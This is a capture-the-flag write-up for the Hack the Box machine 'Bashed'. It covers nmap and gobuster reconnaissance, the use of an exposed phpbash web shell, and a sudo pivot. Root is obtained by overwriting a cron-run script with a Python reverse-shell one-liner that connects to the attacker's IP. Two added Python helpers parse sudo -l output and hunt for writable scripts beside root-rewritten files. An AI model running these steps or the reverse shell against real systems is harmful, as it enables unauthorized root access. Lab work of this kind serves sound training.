Hack the Box: Bashed

I started with a full-port nmap scan of the box (only port 80 came back open):

# Nmap 7.25BETA2 scan initiated Sat Feb 10 10:05:35 2018 as: nmap -vv -Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -oA detailed_scan -n 10.10.10.68

Increasing send delay for 10.10.10.68 from 0 to 5 due to 379 out of 1262 dropped probes since last increase.
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.26s latency).
Scanned at 2018-02-10 10:05:37 EST for 1856s
Not shown: 65485 closed ports
Reason: 65485 resets
PORT      STATE    SERVICE REASON                              VERSION
80/tcp    open     http    syn-ack ttl 63                      Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
7515/tcp  filtered unknown no-response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.25BETA2%E=4%D=2/10%OT=80%CT=1%CU=40317%PV=Y%DS=2%DC=T%G=Y%TM=5A
OS:7F1181%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(S
OS:P=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%II
OS:=I%TS=8)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%TS=8)OPS(O1=M508ST11NW7%O2=M508ST1
OS:1NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=71
OS:20%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5
OS:08NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.007 days (since Sat Feb 10 10:26:33 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   257.82 ms 10.10.14.1
2   259.11 ms 10.10.10.68


Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Feb 10 10:36:33 2018 -- 1 IP address (1 host up) scanned in 1859.43 seconds

I browsed the site on port 80, then brute-forced directories with gobuster:

root@kali:~/Desktop/HTB/bashed# gobuster -u http://10.10.10.68/ \
> -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s '200,204,301,302,307,403,500' -e

Gobuster v1.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.68/
[+] Threads : 10
[+] Wordlist : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 200,204,301,302,307,403,500
[+] Expanded : true
=====================================================
http://10.10.10.68/.hta (Status: 403)
http://10.10.10.68/.htpasswd (Status: 403)
http://10.10.10.68/.htaccess (Status: 403)
http://10.10.10.68/css (Status: 301)
http://10.10.10.68/dev (Status: 301)
http://10.10.10.68/fonts (Status: 301)

Under http://10.10.10.68/dev I found phpbash.php, a semi-interactive web shell (https://github.com/Arrexel/phpbash), which gave me command execution as www-data.

I looked around the filesystem and found a folder, /scripts, owned by scriptmanager:

www-data@bashed:/# ls -lah

total 88K
drwxr-xr-x 23 root root 4.0K Dec 4 13:02 .
drwxr-xr-x 23 root root 4.0K Dec 4 13:02 ..
drwxr-xr-x 2 root root 4.0K Dec 4 11:22 bin
drwxr-xr-x 3 root root 4.0K Dec 4 11:17 boot
drwxr-xr-x 19 root root 4.2K Apr 28 09:52 dev
drwxr-xr-x 89 root root 4.0K Dec 4 17:09 etc
drwxr-xr-x 4 root root 4.0K Dec 4 13:53 home
lrwxrwxrwx 1 root root 32 Dec 4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4.0K Dec 4 11:16 lib
drwxr-xr-x 2 root root 4.0K Dec 4 11:13 lib64
drwx------ 2 root root 16K Dec 4 11:13 lost+found
drwxr-xr-x 4 root root 4.0K Dec 4 11:13 media
drwxr-xr-x 2 root root 4.0K Feb 15 2017 mnt
drwxr-xr-x 2 root root 4.0K Dec 4 11:18 opt
dr-xr-xr-x 117 root root 0 Apr 28 09:52 proc
drwx------ 3 root root 4.0K Dec 4 13:03 root
drwxr-xr-x 18 root root 500 Apr 28 09:53 run
drwxr-xr-x 2 root root 4.0K Dec 4 11:18 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 18:06 scripts
drwxr-xr-x 2 root root 4.0K Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Apr 28 09:53 sys
drwxrwxrwt 10 root root 4.0K Apr 28 09:53 tmp
drwxr-xr-x 10 root root 4.0K Dec 4 11:13 usr
drwxr-xr-x 12 root root 4.0K Dec 4 11:20 var
lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

I ran sudo -l and found that www-data can run any command as the user scriptmanager without a password:

sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
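The sudo -l output above is the kind of thing worth parsing automatically when you land on a box. The following is an added example, not code from the original writeup: it parses sudo -l output into rules and flags the ones that give a password-less hop to another account (NOPASSWD with ALL, or a run-as of root). The sample text embedded in SAMPLE is copied from the output above; parse_sudo_l and interesting are names chosen for this example.

```python
"""Parse `sudo -l` output and flag rules usable for lateral movement or privesc.

Added example, not part of the original writeup. SAMPLE is the sudo -l output
from the Bashed box; the parser and the `interesting` filter are this example's
own code."""
import re
from dataclasses import dataclass
from typing import List

SAMPLE = r"""
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""


@dataclass
class SudoRule:
    runas_user: str
    runas_group: str     # empty when the rule has no group part
    nopasswd: bool
    commands: List[str]


# "(user : group) TAG: TAG: cmd1, cmd2" -- the group part and the tags are optional.
RULE_RE = re.compile(
    r"^\s*\((?P<user>[^:)\s]+)(?:\s*:\s*(?P<group>[^)\s]+))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Return the rules listed after the 'User X may run ...' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags") or ""
        commands = [c.strip() for c in m.group("cmds").split(",")]
        rules.append(SudoRule(m.group("user"), m.group("group") or "",
                              "NOPASSWD:" in tags, commands))
    return rules


def interesting(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that need no password and either allow ALL or run as root.
    On Bashed: www-data -> scriptmanager with ALL, the hop used below."""
    return [r for r in rules
            if r.nopasswd and ("ALL" in r.commands or r.runas_user in ("root", "ALL"))]


if __name__ == "__main__":
    for r in interesting(parse_sudo_l(SAMPLE)):
        print(f"run as {r.runas_user or '?'}: {', '.join(r.commands)} (NOPASSWD)")
```

The regex deliberately accepts multiple tags (`SETENV: NOPASSWD:`) and a missing group part, since both forms appear in real sudo -l output; anything that does not parse is skipped rather than guessed at.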

The directory is mode 774, so as www-data I could list names in it but not enter it; using sudo -u scriptmanager I changed its permissions so I could work inside it.

It contained two files, test.py and test.txt:

www-data@bashed:/scripts# ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Feb 10 20:09 test.py
-rw-r--r-- 1 root root 12 Feb 10 20:43 test.txt

test.py

f = open("test.txt", "w")
f.write("testing 123!")
f.close

test.txt

testing 123!

I noticed from its timestamp that test.txt was being rewritten every few minutes (no more than 5 minutes apart) and that root owns it, even though test.py belongs to scriptmanager. The only way a root-owned file keeps getting re-created from that script is if root is running test.py on a schedule (a cron job), so whatever I put in test.py will run as root.

I changed the permissions of test.py so that www-data could overwrite it, then replaced its contents with a Python reverse shell pointing at my machine:

sudo -u scriptmanager chmod 777 /scripts/test.py

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.15',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > test.py

With a listener waiting on 10.10.14.15:1337, the scheduled job picked up the modified script within a few minutes and I got a root shell.
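The observations that made this privesc work (a script owned by an account I could become, next to an output file root keeps rewriting) are easy to check for systematically. The following is an added example, not code from the original writeup: it scans a directory for that pattern and estimates the job period from sampled timestamps. The names Entry, Finding, scan_dir, attacker_can_write, find_cron_targets and rewrite_interval are this example's own; the records in the demo are constructed to mirror the /scripts listing above.

```python
"""Hunt for the privesc pattern used on Bashed: a script an account the attacker
controls can rewrite, next to an output file a privileged account re-creates on
a schedule.

Added example, not code from the original writeup.  find_cron_targets() works
on plain Entry records so it can be checked offline; scan_dir() builds such
records from a real directory with os.lstat()."""
import os
import pwd
import stat
import time
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

SCRIPT_SUFFIXES = (".py", ".sh", ".pl", ".rb")


@dataclass
class Entry:
    name: str
    owner: str     # user name, e.g. "scriptmanager"
    mode: int      # permission bits only, e.g. 0o644
    mtime: float   # last modification, epoch seconds


@dataclass
class Finding:
    script: str
    reason: str
    evidence: List[str]   # recently rewritten files owned by the privileged user


def scan_dir(path: str) -> List[Entry]:
    """Build Entry records for the regular files directly under `path`."""
    entries = []
    for name in sorted(os.listdir(path)):
        st = os.lstat(os.path.join(path, name))
        if not stat.S_ISREG(st.st_mode):
            continue
        try:
            owner = pwd.getpwuid(st.st_uid).pw_name
        except KeyError:
            owner = str(st.st_uid)
        entries.append(Entry(name, owner, stat.S_IMODE(st.st_mode), st.st_mtime))
    return entries


def attacker_can_write(e: Entry, controlled: Set[str]) -> Optional[str]:
    """Why the attacker could change this file, or None if they cannot.
    `controlled` holds every account the attacker can act as (their own user
    plus any sudo -u / su targets).  Group membership is not modelled here
    (an assumption of this example): group-write is only reported as a hint."""
    if e.owner in controlled:
        return f"owned by controlled account {e.owner}"
    if e.mode & stat.S_IWOTH:
        return "world-writable"
    if e.mode & stat.S_IWGRP:
        return "group-writable (check group membership)"
    return None


def find_cron_targets(entries: Iterable[Entry], controlled: Set[str],
                      privileged: str = "root", max_age: float = 600.0,
                      now: Optional[float] = None) -> List[Finding]:
    """Scripts the attacker can modify that sit beside a file the privileged
    account wrote within the last `max_age` seconds.  A fresh root-owned
    test.txt next to a scriptmanager-owned test.py is exactly that hint."""
    now = time.time() if now is None else now
    entries = list(entries)
    fresh = [e.name for e in entries
             if e.owner == privileged and now - e.mtime <= max_age]
    if not fresh:
        return []
    findings = []
    for e in entries:
        if not e.name.endswith(SCRIPT_SUFFIXES):
            continue
        why = attacker_can_write(e, controlled)
        if why:
            findings.append(Finding(e.name, why, fresh))
    return findings


def rewrite_interval(observed_mtimes: Iterable[float]) -> Optional[float]:
    """Estimate the job period from mtimes sampled while polling the output
    file (the manual check behind "it updates every <= 5 minutes")."""
    ts = sorted(set(observed_mtimes))
    if len(ts) < 2:
        return None
    return min(b - a for a, b in zip(ts, ts[1:]))


if __name__ == "__main__":
    # Constructed records mirroring the /scripts listing from the writeup.
    now = time.time()
    listing = [Entry("test.py", "scriptmanager", 0o644, now - 3600),
               Entry("test.txt", "root", 0o644, now - 90)]
    for f in find_cron_targets(listing, controlled={"www-data", "scriptmanager"}, now=now):
        print(f"{f.script}: {f.reason}; recent root output: {f.evidence}")
```

On a live box you would feed scan_dir("/scripts") into find_cron_targets with the accounts sudo -l lets you become, and poll the output file's mtime a few times into rewrite_interval to learn how long to wait after planting the payload.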
